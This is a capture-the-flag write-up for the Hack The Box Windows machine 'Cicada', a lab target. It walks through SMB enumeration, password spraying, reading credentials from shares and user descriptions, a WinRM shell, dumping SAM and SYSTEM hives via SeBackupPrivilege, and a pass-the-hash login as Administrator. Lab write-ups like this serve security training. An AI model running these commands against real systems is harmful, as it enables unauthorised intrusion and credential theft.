[HTB] Cicada

First Post:

Last Update:
OS:Windows Windows
Difficulty: Easy
Author: theblxckcicada
Release Date: September 28, 2024

Video Walkthrough

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
nmap -T4 -A -p- 10.10.11.35 -o initial_scan.nmap 
Nmap scan report for 10.10.11.35
Host is up (0.041s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-04 05:06:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
59896/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-03-04T05:07:09
|_  start_date: N/A
|_clock-skew: 6h59m59s

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   40.58 ms 10.10.14.1
2   41.44 ms 10.10.11.35

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar  3 22:07:49 2025 -- 1 IP address (1 host up) scanned in 189.08 seconds

User

SMB Without Password

We can find two non default shares without using a password

1
smbclient -L \\\\10.10.11.35\\

We can access the HR share and download a file called “Notice from HR.txt”

1
2
smbclient \\\\10.10.11.35\\HR
get "Notice from HR.txt”

From the file’s content, we get a password

Cicada$M6Corpb*@Lp#nZp!8

RID Enumeration

With the obtained password, we can use ridenum to enumerate users through RID enumeration

1
ridenum 10.10.11.35 500 5000 '' 'Cicada$M6Corpb*@Lp#nZp!8’

We now have a file with the new obtained users
We can use NetExec to find out if any user uses the previously obtained password.

1
netexec smb 10.10.11.35 -u 10.10.11.35_users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8’

The user ‘michael.wrightson’ uses the password ‘Cicada$M6Corpb*@Lp#nZp!8’, we can use this to try and enumerate more users

1
netexec smb 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users


We can see the password for the user ‘david.orelious’ in the user’s description

david.orelious:aRt$Lp#7t*VQ!3

Enumerate shares with the new credentials

1
netexec smb 10.10.11.35 -d cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares

This user has READ access to the “DEV” share

1
2
smbclient \\\\10.10.11.35\\DEV -U david.orelious
get Backup_script.ps1

emily.oscars:Q!3@Lp#M6b7tVt

Now we can get a shell as emily using evil-winrm

1
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

PrivEsc

SeBackupPrivilge

If we check the current user’s privileges, we can find the SeBackupPrivilege is enabled

1
whoami /priv

By googling privilege escalation with this privilege, we can find this blog post
With this privilege we can save a backup of the SAM and SYSTEM hives, and then transfer it to our machine to extract the hive secrets

So the first step is to save the backup of both hives (SAM and SYSTEM)

1
2
3
4
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system`

And then transfer both to our machine

1
2
3
cd Temp
download sam
download system`

With both files in our machine we can run pypykatz to extract the hive’s secrets

1
pypykatz registry --sam sam system

Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

With the Administrator NTLM hash, we can just get a shell using evil-winrm

1
evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Rooted :)